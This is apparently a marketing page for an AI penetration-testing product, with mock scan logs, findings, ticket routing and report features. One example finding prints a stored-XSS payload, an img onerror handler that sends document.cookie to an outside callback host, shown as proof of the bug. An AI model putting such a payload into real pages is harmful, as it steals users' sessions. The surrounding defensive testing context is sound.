NewStart your first free run
Product

A senior pentester that tests, proves, and fixes.

Black box from a URL, grey box with logins, white box across your repositories. interopt refuses to report anything it cannot prove against what it actually saw.

inventory

Everything under test, in one list.

Every target in one inventory, scored and owned: a URL, an API and the repository behind them sit in the same list rather than in three different tools.

01 / The workspace

From the first request to the merged fix.

The run, the findings it proves, the tickets they become and the report at the end all sit in one workspace.

Scans

Watch a run live, then replay it.

Every scan walks the same four phases: prerequisites, discover, scan and report. The agent's output streams while it works, and afterwards the same view becomes a replay you can scrub.

  • Output tagged by phase and container
  • Replay at 1×, 2×, 4× or 8×
  • The full log, downloadable per run
Live session in the docs
Execution board
Scan complete
grey-box / 7F4A2233 · 4h 41m
Step 1Prerequisites
Step 2Discover
Step 3Scan
Step 4Report
Replayall containers Download log
[discover]214 routes mapped on api.acme.io
[discover]3 auth flows recorded: session, refresh, invite
[scan]GET /v2/orders/8842 as [email protected]
[scan]200 · body carries customer cus_19 (alice)
[scan]Confirmed: order lookup skips the owner check
[report]F-4CE0EE34 written with request and response
1×2×4×8×
Findings

Every finding opens on its proof.

Description, risk, observation and remediation, in that order. The observation holds the requests that proved it, and the CVSS score opens into the metric-by-metric vector behind it.

  • CVSS 3.1 or 4.0, one scale per workspace
  • OWASP WSTG test id on web findings
  • Re-test one finding without rescanning the asset
Severity and scoring
highF-D88A7A48Stored XSS in shared report view
Settings Re-test
FindingSuggested fixAIActivity4Notes
Observation

The report title is stored as sent and rendered unescaped when the share link is opened:

1POST /api/reports HTTP/2
2Host: app.acme.io
3
4{"title":"<img src=x onerror=fetch('//oob.acme-
5test.io/'+document.cookie)>"}

Opening the link as a second user sent their session to the callback host.

CVSS v3.1Severity breakdown7.6High
AVAttack VectorN NetworkA AdjacentL Local
ACAttack ComplexityL LowH High
PRPrivileges RequiredN NoneL LowH High
UIUser InteractionN NoneR Required
Issue routing

Findings file themselves in your tracker.

Turn on automatic issues when you set up a scan and every finding it proves becomes a linked ticket. The ticket's state comes back onto the finding, so nothing has to be updated twice.

  • Jira, Linear, GitHub, GitLab, Datadog and ServiceNow
  • Alerts to Slack, Teams or Discord
  • Tickets close when a retest proves the fix
Issue routing
Step 5
After the scan
Create issues automaticallyAfter a successful scan, one linked issue for each finding.
Issue trackerLinear · team Platform
Jiraproject SECLinearteam PlatformGitHubacme/apiGitLabconfidential issueDatadogwork item
highMissing CSRF protection on POST /billing
PLAT-482In progressSync status
Reports

A report built from the runs themselves.

Pick the pentest report or the executive summary, choose the scans, and the findings, evidence, scores and scope fill in. Share it as a private link that expires, carries a password and logs every view.

  • A notification when someone opens your shared link
  • Scheduled reports that follow recurring runs
Report templates
Step 01
Template
Penetration Test ReportCONFIDENTIAL
criticalSQL injection on /api/v1/usershighAny user can read another customer's ordermediumReflected XSS on /search
Pentest reportScope, scoring and every finding with evidence.
Executive SummaryCONFIDENTIAL
D24open findings
Executive summaryCover, summary and scope for leadership.
Share report
A private, read-only link for this report.
app.interopt.ai/r/wmMBMzCH02kLu…Ok8 Copy
Expires24h7d15d30d
Password protection
Draft watermark
Track every view
MO Viewed by auditor · 2h agoDone
02 / Compare

What each approach actually gives you.

Each of these does one part of the job well. You need all of it — proof, the logic bugs, the file and line, the fix, and the same again on the next release.

Manual pentest
DAST scanner
Static analysis
Every finding proven, with evidence you can reproduce
Sometimes
Catches broken permissions and broken workflows
Points to the file and line behind the behaviour
Sometimes
Opens the fix as a pull request
Some tools
Pentest-grade report when the run ends
Instant
Weeks later
Runs again on every deploy
03 / Inside interopt

Everything around the agent.

Ephemeral environments

Where there is nothing running to test, the agent builds the target from source and tears it down after. Production stays out of scope unless you put it in.

Self-hosted (coming soon)

Running the whole thing inside your own infrastructure, for when the code cannot leave your network.

Any stack it can reach or read

Testing runs against the app as deployed, so the language is never a prerequisite. Connect source and the agent works the frameworks out from the repo.

ready when you are

Give it what you have. Get proof back.

A URL, a set of logins, or the repository itself. interopt tests what it is given, proves what it finds, and with your code connected, opens the pull request that fixes it.